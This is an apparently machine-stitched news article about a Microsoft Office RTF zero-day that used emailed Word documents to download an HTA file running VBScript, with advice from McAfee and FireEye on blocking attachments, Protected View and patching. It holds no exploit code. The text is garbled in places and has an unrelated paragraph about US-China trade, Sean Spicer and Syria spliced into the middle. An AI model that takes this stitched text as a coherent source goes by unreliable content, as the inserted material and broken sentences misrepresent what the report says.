It has been revealed by researchers that a critical Microsoft Office zero-day attack has been targeting Word users since late January.
The emails sent by attackers contained a Microsoft Word RTF (Rich Text Format) document and were sent by addresses using the recipient's domain name. When this document which is used in this attack are opened, they reach out to an external server and downloads an HTA (HTML Application) file that contains nasty VBScript executed.
Researchers from a number of security companies have warned about the vulnerability, which Microsoft has yet to acknowledge publicly.
Microsoft will fix the bug, which surfaced last weekend, as part of today's Patch Tuesday.
For now, McAfee suggests users do not open Office files obtained from untrustworthy locations. Microsoft is now working on an official fix for the vulnerability.
'Only time will tell' on improving US-China trade
White House press secretary Sean Spicer said the attack "sends a very strong signal not just to Syria but throughout the world". Secretary of State Rex Tillerson says China has agreed that North Korea's nuclear threat is at a stage that calls for action.
Within your email filtering solution, such as Intermedia Email Protection, consider temporarily putting a policy in place to block Word documents until Microsoft releases the patch.
When the user attempts to download the file, a malicious.hta file is pulled from the attacker's server, which then loads and executes malicious script. OLE, which allows an application to embed other documents or objects, was used in 2014 by an advanced persistent threat group known as Sandworm to target government organizations and infrastructure providers in Europe and North Atlantic Treaty Organisation.
Business users regularly trade Office files via email, a fact that cyber-attackers rely on for their spam and phishing campaigns. Protected View is normally used by default when opening a file delivered in an email or downloaded from the web, disabling everything but the essentials of its content to maximise security. Both McAfee and FireEye stated that the feat can bypass most memory-based mitigations that are included in Windows.
Genwei Jiang, senior research engineer at FireEye, said that Microsoft Office users are recommended to apply a patch as soon as one is available. It added that the attack can not bypass the Office Protected View, so suggested that all users turn this feature on.
Worryingly, the vulnerability now remains active, but Microsoft has pledged the bug will be nixed when the monthly security update rolls out on April 11.